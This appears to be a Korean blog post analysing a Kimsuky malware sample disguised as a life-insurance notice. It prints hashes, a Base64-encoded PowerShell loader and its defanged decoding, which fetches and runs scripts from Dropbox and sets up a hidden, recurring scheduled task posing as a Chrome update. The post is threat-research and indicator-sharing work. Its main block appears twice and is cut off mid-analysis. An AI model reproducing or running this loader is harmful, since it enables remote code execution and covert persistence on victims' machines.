김수키(Kimsuky) 에서 만든 종신안내장 으로 위장한 악성코드-종신안내장v02_곽X환d.zip(2025.2.5)
Contents
오늘은 북한 해킹 단체 김수키(Kimsuky)에서 만든 악성코드인 종신안내장 으로 위장한 악성코드-종신안내장v02_곽X환d.zip(2025.2.5)에 대해 글을 적어보겠습니다.일단 일단 PDF 파일인 것처럼 돼 있지만, 사실은 PDF 파일이 아닌 그냥 링크 파일 아니다. 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:종신안내장v02_곽X환d.zip
사이즈:6,427 Bytes
MD5:40837012253331958723dda63fdfabff
SHA-256:079907b7feab3673a1767dbfbc0626e656f5d3b03b6cff471cc7cf8a1973ab34
Base64 인코딩
JGhoaCA9IEpvaW4tUGF0aCAoW1N(5)c3Rl(b)S5JTy5QYXRoXTo6R2V0VGVtcFBh(d)GgoKSkgIuyiheyLoOyViOu
CtOyepVYwMl/qs73shLHtmZhELnBkZi5wZGYiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250Z
W50LmNv(b)S9zY2wvZmkvbGM3ajdiZTN2dGQyZj(N)oYWR2MGJ6L1YwMl8tRC5wZGYucGRmP3Jsa2V5PXduYWg5ZWR
mMzl2djh2YTdndm1vZHltY2gmc3Q9NjRsaXpyNmsmZGw9MCIgLU91dEZpbGUgJGhoaDsgJiAkaG(h)oOyAkcHBwID
0gSm9pbi1QYXRo(I)CgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoI
CgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7IHdnZXQgLVVyaSAiaH(R)0cHM6Ly9kbC5kcm9wYm94dX(N)lcmNvbn
RlbnQuY29tL3NjbC9maS9nczU4dTZxdnZ4b3J6dHR2MDl5dnQva3hzeGh4LXgudHh0P3Jsa2V5PXY4NnBkN2kybmp
tN3UwcGZ1dGwwa251Njgmc3Q9Z2p(2)ZGN3OHImZGw9MCIgLU91dEZp(b)GUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtS
XRlbSAtUGF0aCAkYWFhIC1Gb3JjZTsnOyAkc3RyIHwgT3V0LUZpbGUgLUZpbGVQYXRoICRwcHAgLUVuY29kaW5nIFV
URjg(7)ICRhY3Rpb24gPSBOZXctU2(N)oZWR1bGVkVGFza0FjdGlvbiAtRXhlY3V0ZSAnUG93ZXJTaGVsbC5leGUnI
C1Bcmd1bWVudCAnLVdpbmRvd1N0eWxlIEhpZGRlbiAtbm9wICAtTm9uSW50ZXJhY3RpdmU(g)LU5vUHJvZmlsZSA
tRXhl(Y)3V0aW9uUG9saWN5IEJ5cGFzcyAtQ29tbWFuZCAiJiB7JGFiYyA9IEpvaW4tUGF0aCAoJGVudjpBcHBEY
XRhKSBcImNocm9tZS5wczFcIjsgJiAkYWJjO30iJzsgJHRyaWd(n)ZXIgPSBOZXctU2NoZWR(1)bGVkVGFza1RyaWd
nZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcyg1KSAtUmVwZXRpdGlvbkludGVydmFsIChOZXctVGltZ
VNwYW4gLU1pbnV0ZXMgMzApOyA(k)c2V0dGluZ3MgPSBOZ(X)ctU2NoZWR1bGVkVGFza1NldHRpbmdzU2V0IC1IaWRk
ZW47IFJlZ2lzdGVyLVNjaGVkdWxlZFRhc2sgLVRhc2tOYW1lICJDaHJvbWVVcGRhdGVUYXNrTWFjaGluZSIgLUFjdGl
(v)biAkYWN0aW9uIC1(U)cmlnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICAkYWFhID0gSm9pbi1QYX
RoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd2dldCAtVXJpIC(J)odHRwczovL2RsLmR(y)b3Bib
3h1c2VyY29udGVudC5jb20vc2NsL2ZpL3N1bWNoOG8xMmE0a283d3FxdHJnby9reHN4aHgtZi50eHQ/cmxrZXk9aTh5
dG81eGczdW5mZnM5d2F3aHl0dTF2NCZzdD1yZW(s)5ZGdjbCZkbD0wI(i)AtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJ
lbW92ZS1JdGVtIC1QYXRo
ICRhYWEgLUZvcmNlOw==
Base64 디코딩
$hhh = Join-Path ([System(.)IO(.)Path]::GetTempP(at)h()) "종신안
내장V02_곽x환D(.)pdf(.)pdf"; wget -Uri "hxxps://dl(.)dropboxuser
content(.)com/scl/fi/lc7j7be3vtd2f3hadv0bz/V02_-D(.)pdf.pdf?rlkey
=wnah9edf39vv8va7gvmo9d)ymch&st=64lizr6k&dl=(0)" -OutFile $hhh; &
$hhh; $ppp = J(o)in-Path ($env:AppData) "chrome(.)ps1"; $str = '$aa
a = Joi(n)-Path ($env:AppData) "temp(.)ps1"; wget -Uri "hxxps://dl(.)dropbox
usercontent(.)com/scl/fi/gs58u6qvvxorzttv09yvt/kxsxhx-x(.)txt?rlkey=v86pd7i2(n)jm7
0pfutl0knu68&st=gjvdcw8r&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force
;'; $str | Out-File -FilePa(t)h $ppp -Encoding UTF8; $ac(t)ion = New-Sche(d)uled
TaskAction -Execute 'PowerShell(.)exe' -Argument '-WindowStyle Hid(d)en -nop -N
onIntera(c)tive -NoProfile -Executi(o)nPolicy Bypass -Comman(d) "& {$abc = Join(-)Pa
th ($env:AppData) \"chrome(.)ps1\"; & $abc;}"'; $trigger = New-Scheduled(T)askTrigger
-Once -At (Get-Date).A(d)dMinutes(5) -RepetitionInterval (New-TimeSpan -Minut(e)s 30)
; $settings = New-ScheduledTas(k)SettingsSet -Hidden; Register-(S)cheduledTask -TaskN
ame "ChromeUp(d)ateTaskMachine" -Action $action -Trigger $trigger -Settings $settings
; $aaa = Join-Path ($env:AppData) "system_first(.)ps1"; wget -Uri "hxxps://dl(.)drop
boxusercontent(.)com/scl/fi/sumch8o12a4ko7wqqtrgo/kxsxhx-f(.)txt?rlkey=i8yto5xg3unffs
9wawhytu1v4&st=rek9dgcl&dl=0" -OutFile $aaa; &
$aaa; Remove-Item -Path $aaa -Force;
코드 분석
1.Join-Path ([System(.)IO(.)P(a)th]::G(e)tTempPath()) 종신안내장V02_곽x환D(.)pdf(.)pdf
임시 폴더(Temp)에 종신안내장V02_곽X환D(.)pdf(.)pdf 파일을 저장할 경로를 설정
Dropbox에서 V02_-D.pdf.pdf 라는 파일을 다운로드 해서 Temp …
파일명:종신안내장v02_곽X환d.zip
사이즈:6,427 Bytes
MD5:40837012253331958723dda63fdfabff
SHA-256:079907b7feab3673a1767dbfbc0626e656f5d3b03b6cff471cc7cf8a1973ab34
Base64 인코딩
JGhoaCA9IEpvaW4tUGF0aCAoW1N(5)c3Rl(b)S5JTy5QYXRoXTo6R2V0VGVtcFBh(d)GgoKSkgIuyiheyLoOyViOu
CtOyepVYwMl/qs73shLHtmZhELnBkZi5wZGYiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250Z
W50LmNv(b)S9zY2wvZmkvbGM3ajdiZTN2dGQyZj(N)oYWR2MGJ6L1YwMl8tRC5wZGYucGRmP3Jsa2V5PXduYWg5ZWR
mMzl2djh2YTdndm1vZHltY2gmc3Q9NjRsaXpyNmsmZGw9MCIgLU91dEZpbGUgJGhoaDsgJiAkaG(h)oOyAkcHBwID
0gSm9pbi1QYXRo(I)CgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoI
CgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7IHdnZXQgLVVyaSAiaH(R)0cHM6Ly9kbC5kcm9wYm94dX(N)lcmNvbn
RlbnQuY29tL3NjbC9maS9nczU4dTZxdnZ4b3J6dHR2MDl5dnQva3hzeGh4LXgudHh0P3Jsa2V5PXY4NnBkN2kybmp
tN3UwcGZ1dGwwa251Njgmc3Q9Z2p(2)ZGN3OHImZGw9MCIgLU91dEZp(b)GUgJGFhYTsgJiAkYWFhOyBSZW1vdmUtS
XRlbSAtUGF0aCAkYWFhIC1Gb3JjZTsnOyAkc3RyIHwgT3V0LUZpbGUgLUZpbGVQYXRoICRwcHAgLUVuY29kaW5nIFV
URjg(7)ICRhY3Rpb24gPSBOZXctU2(N)oZWR1bGVkVGFza0FjdGlvbiAtRXhlY3V0ZSAnUG93ZXJTaGVsbC5leGUnI
C1Bcmd1bWVudCAnLVdpbmRvd1N0eWxlIEhpZGRlbiAtbm9wICAtTm9uSW50ZXJhY3RpdmU(g)LU5vUHJvZmlsZSA
tRXhl(Y)3V0aW9uUG9saWN5IEJ5cGFzcyAtQ29tbWFuZCAiJiB7JGFiYyA9IEpvaW4tUGF0aCAoJGVudjpBcHBEY
XRhKSBcImNocm9tZS5wczFcIjsgJiAkYWJjO30iJzsgJHRyaWd(n)ZXIgPSBOZXctU2NoZWR(1)bGVkVGFza1RyaWd
nZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcyg1KSAtUmVwZXRpdGlvbkludGVydmFsIChOZXctVGltZ
VNwYW4gLU1pbnV0ZXMgMzApOyA(k)c2V0dGluZ3MgPSBOZ(X)ctU2NoZWR1bGVkVGFza1NldHRpbmdzU2V0IC1IaWRk
ZW47IFJlZ2lzdGVyLVNjaGVkdWxlZFRhc2sgLVRhc2tOYW1lICJDaHJvbWVVcGRhdGVUYXNrTWFjaGluZSIgLUFjdGl
(v)biAkYWN0aW9uIC1(U)cmlnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICAkYWFhID0gSm9pbi1QYX
RoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd2dldCAtVXJpIC(J)odHRwczovL2RsLmR(y)b3Bib
3h1c2VyY29udGVudC5jb20vc2NsL2ZpL3N1bWNoOG8xMmE0a283d3FxdHJnby9reHN4aHgtZi50eHQ/cmxrZXk9aTh5
dG81eGczdW5mZnM5d2F3aHl0dTF2NCZzdD1yZW(s)5ZGdjbCZkbD0wI(i)AtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJ
lbW92ZS1JdGVtIC1QYXRo
ICRhYWEgLUZvcmNlOw==
Base64 디코딩
$hhh = Join-Path ([System(.)IO(.)Path]::GetTempP(at)h()) "종신안
내장V02_곽x환D(.)pdf(.)pdf"; wget -Uri "hxxps://dl(.)dropboxuser
content(.)com/scl/fi/lc7j7be3vtd2f3hadv0bz/V02_-D(.)pdf.pdf?rlkey
=wnah9edf39vv8va7gvmo9d)ymch&st=64lizr6k&dl=(0)" -OutFile $hhh; &
$hhh; $ppp = J(o)in-Path ($env:AppData) "chrome(.)ps1"; $str = '$aa
a = Joi(n)-Path ($env:AppData) "temp(.)ps1"; wget -Uri "hxxps://dl(.)dropbox
usercontent(.)com/scl/fi/gs58u6qvvxorzttv09yvt/kxsxhx-x(.)txt?rlkey=v86pd7i2(n)jm7
0pfutl0knu68&st=gjvdcw8r&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force
;'; $str | Out-File -FilePa(t)h $ppp -Encoding UTF8; $ac(t)ion = New-Sche(d)uled
TaskAction -Execute 'PowerShell(.)exe' -Argument '-WindowStyle Hid(d)en -nop -N
onIntera(c)tive -NoProfile -Executi(o)nPolicy Bypass -Comman(d) "& {$abc = Join(-)Pa
th ($env:AppData) \"chrome(.)ps1\"; & $abc;}"'; $trigger = New-Scheduled(T)askTrigger
-Once -At (Get-Date).A(d)dMinutes(5) -RepetitionInterval (New-TimeSpan -Minut(e)s 30)
; $settings = New-ScheduledTas(k)SettingsSet -Hidden; Register-(S)cheduledTask -TaskN
ame "ChromeUp(d)ateTaskMachine" -Action $action -Trigger $trigger -Settings $settings
; $aaa = Join-Path ($env:AppData) "system_first(.)ps1"; wget -Uri "hxxps://dl(.)drop
boxusercontent(.)com/scl/fi/sumch8o12a4ko7wqqtrgo/kxsxhx-f(.)txt?rlkey=i8yto5xg3unffs
9wawhytu1v4&st=rek9dgcl&dl=0" -OutFile $aaa; &
$aaa; Remove-Item -Path $aaa -Force;
코드 분석
1.Join-Path ([System(.)IO(.)P(a)th]::G(e)tTempPath()) 종신안내장V02_곽x환D(.)pdf(.)pdf
임시 폴더(Temp)에 종신안내장V02_곽X환D(.)pdf(.)pdf 파일을 저장할 경로를 설정
Dropbox에서 V02_-D.pdf.pdf 라는 파일을 다운로드 해서 Temp …
IoC
40837012253331958723dda63fdfabff
079907b7feab3673a1767dbfbc0626e656f5d3b03b6cff471cc7cf8a1973ab34
079907b7feab3673a1767dbfbc0626e656f5d3b03b6cff471cc7cf8a1973ab34